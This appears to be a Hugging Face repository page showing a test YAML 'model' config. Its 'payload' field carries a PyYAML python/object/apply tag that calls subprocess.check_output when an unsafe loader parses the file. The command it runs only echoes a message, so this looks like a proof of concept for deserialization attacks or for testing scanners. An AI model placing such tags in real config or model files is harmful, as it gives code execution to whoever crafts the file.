testmodel / model_1003.yaml
dltest12345's picture
models test
d21fc0d verified
model:
name: MaliciousModel
layers: 3
activation: relu
payload: !!python/object/apply:subprocess.check_output
args: [["echo", "Malicious YAML model executed!"]]
kwds: {shell: false}